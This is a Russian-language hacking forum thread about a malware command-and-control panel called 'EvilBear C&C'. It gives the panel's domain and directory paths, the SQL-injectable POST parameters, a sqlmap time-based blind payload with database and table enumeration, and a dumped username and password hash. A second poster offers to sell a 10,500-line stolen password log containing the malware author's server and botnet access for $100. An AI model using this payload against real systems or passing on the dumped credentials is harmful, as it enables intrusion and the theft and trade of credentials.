EvilBear C&C

[hackworld]

Всем доброго дня наткнулся на такую зловреду решил поизучать

EvilBear C&C

Главная страница https://matix.cf/

EvilBear C&C

matix.cf

Отчеты хранятся в https://matix.cf/uploads/

Модули https://matix.cf/modules/

Логи https://matix.cf/logs/

Переходим к самому интересному sql

1 /login.php post pass=administrator&user=admin
Параметр user уязвим
2 /reg.php post magic=1&r_pass=administrator&r_user=5656
Параметр r_user уязвим

Parameter: r_user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: magic=1&r_pass=administrator&r_user=5656' AND (SELECT 8327 FROM (SELECT(SLEEP(5)))QXpR)-- yaFI
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] ioforqbtion_sjhemd
[*] matix

Database: matix
[2 tables]
clients
users

Database: matix
Table: users
[1 entry]
| Username | Password
| mawix    | FC:1B208CDCFB51B71FBCFBC03X65A1FDQ9B1:A62DD7344FD7676E9E5349C6D3

 

[corpserves]

надо было на конкурс выложить водички под лить)))

 

[Ingiborga]

Ну так то это приват ... откуда ты наткнулся вот в чем вопрос)

 

[hackworld]

Наткнулся через сервис

 

[Ingiborga]

Наткнулся через сервис

Понял, автора знаю, он есть на этом форуме. Думаю он скоро объявится тут.
Проект еще на стадии разработки на сколько я знаю.

 

[Ingiborga]

У меня есть лог паролей автора данного софта, в этом логе так же есть данные этой панели и других. Могу продать за 100$)
Файл на 10500 строк.
Там есть пароль от http://matix.cf/index.php но не подходит
Но есть другой домен с этой же админкой с логами туда войти можно + еще херова гора ботнетов у него где то онлайн есть да же.
Так же там есть доступы к его серверам. Лог не трогал наверное пришло его время.
И да он не с РФ. И до того как ко мне пришел этот лог я и не знал что он тут обитает. Правила не нарушал.
Могу скинуть часть лога модерам на проверку.

 

[hackworld]

Трекер если кому интересно https://cybercrime-tracker.net/